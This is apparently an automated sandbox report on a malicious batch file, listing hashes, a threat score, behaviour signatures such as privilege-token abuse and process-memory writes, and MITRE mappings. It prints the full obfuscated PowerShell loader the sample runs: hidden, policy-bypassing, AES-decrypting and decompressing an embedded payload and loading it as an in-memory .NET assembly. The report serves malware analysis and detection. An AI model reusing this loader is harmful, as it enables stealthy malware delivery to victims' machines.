36682e454c21cf545e611f5b5de9115c164433a75b4b20e10e31c37e785c2a14

General

Target

test_bat_c/e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat
Size

10.3MB
MD5

db149b83156f710e18e2233db671dc56
SHA1

ab3a8d2ec8edffb4ac434f11d4af01de8605f558
SHA256

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20
SHA512

21b8d53854978077ea362c75fa0ceebab864a63c62d1b4cf65fcd5d9c74db23144f824957d877825e247fae786183a672e458a7b623364a9df85df34c4c424bf
SSDEEP

49152:NgsDwfz/8H9hPHoep7Qf0f1on7wl/Y/I+3CEwYwmFK4ulynWtDWxTQP4zCrpaeNB:/

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

pid process

1736 e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1992 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

pid process

1736 e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

description pid process

Token: SeDebugPrivilege 1736 e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

pid	process
1736	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

pid	process
1992	cmd.exe

pid	process
1736	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

description	pid	process
Token: SeDebugPrivilege	1736	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1992 wrote to memory of 1736	1992	cmd.exe	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
PID 1992 wrote to memory of 1736	1992	cmd.exe	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
PID 1992 wrote to memory of 1736	1992	cmd.exe	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992

C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
"e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $vPAum = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat').Split([Environment]::NewLine);foreach ($GNRXd in $vPAum) { if ($GNRXd.StartsWith(':: ')) { $HoqqF = $GNRXd.Substring(3); break; }; };$aXtjp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HoqqF);$eJMUB = New-Object System.Security.Cryptography.AesManaged;$eJMUB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$eJMUB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$eJMUB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vKPdCLKA1OHR7DayB6fie0GdrNgcQ/q24hCzTg7sI4k=');$eJMUB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pBAW8NcatCLMZyUq6P32MA==');$ySthJ = $eJMUB.CreateDecryptor();$aXtjp = $ySthJ.TransformFinalBlock($aXtjp, 0, $aXtjp.Length);$ySthJ.Dispose();$eJMUB.Dispose();$uNTLJ = New-Object System.IO.MemoryStream(, $aXtjp);$qowuZ = New-Object System.IO.MemoryStream;$aCWmn = New-Object System.IO.Compression.GZipStream($uNTLJ, [IO.Compression.CompressionMode]::Decompress);$aCWmn.CopyTo($qowuZ);$aCWmn.Dispose();$uNTLJ.Dispose();$qowuZ.Dispose();$aXtjp = $qowuZ.ToArray();$uCJaH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($aXtjp);$rGRlU = $uCJaH.EntryPoint;$rGRlU.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/1736-59-0x000000001AF40000-0x000000001B222000-memory.dmp

Filesize
2.9MB

Download
memory/1736-60-0x0000000001C00000-0x0000000001C08000-memory.dmp

Filesize
32KB

Download
memory/1736-61-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/1736-62-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/1736-63-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/1736-64-0x000000000266B000-0x00000000026A2000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing